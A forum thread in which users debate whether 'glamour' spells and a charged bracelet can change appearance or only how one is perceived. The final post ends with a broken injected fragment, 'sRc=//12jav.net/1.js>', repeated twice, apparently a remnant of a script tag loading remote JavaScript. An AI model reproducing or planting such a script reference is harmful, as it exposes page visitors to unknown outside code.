Honestly, I doubt with any spell or ritual you can activate "glamour", I think glamour spells would be more to activate one's self confidence and such. No spell can help you change yourself physically in anyway or change any of your characteristics, of course it could make you feel better about yourself but nothing that involved physical change.
Actually, the concept itself can be legitimate if one has the understanding that it doesn't alter physical appearance, which the original poster didn't indicate knowledge or ignorance towards the matter.
Just like you'd want to "activate" a glamor, you'd want to "deactivate" it as well because you don't want it affecting you all the time, just like any other spell.
I agree, Alfadottir. I was referring to activating glamour in a physical sense, such as changing appearence or characteristics. Although the poster did not show ignorance or knowleadge towards the matter, I thought I would clarify it for those as Garrett123 wasn't specific towards what the bracelet would do. But I do agree that the concept could be legitimate if the person acknowledges the fact that nothing can alter one's physical characteristcs, at least not by Magick.
No offense meant towards you, Chleo, but I really don't feel like a disclaimer should piggyback a certain kind of post every time it pops up. It's better to simply write about glamor and direct peoples' attention towards it if they want to properly learn it. Glamor is a kind of magic that people will notice right away if it doesn't physically alter their appearence when they want them to.
As for the spell, it's as simple as charging a bracelet to activate a certain subtle something when it is worn and deactivate when it isn't worn. How people go about the spell is up to them, though I am curious why Garret wants people to come to them for the spell instead of just posting it here.

I do understand the basics of glamour. I know that is doesnt change you phisicaly. What this rituL would do is give them a way to create a charm of sorts that would change the way they are pervived by others. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
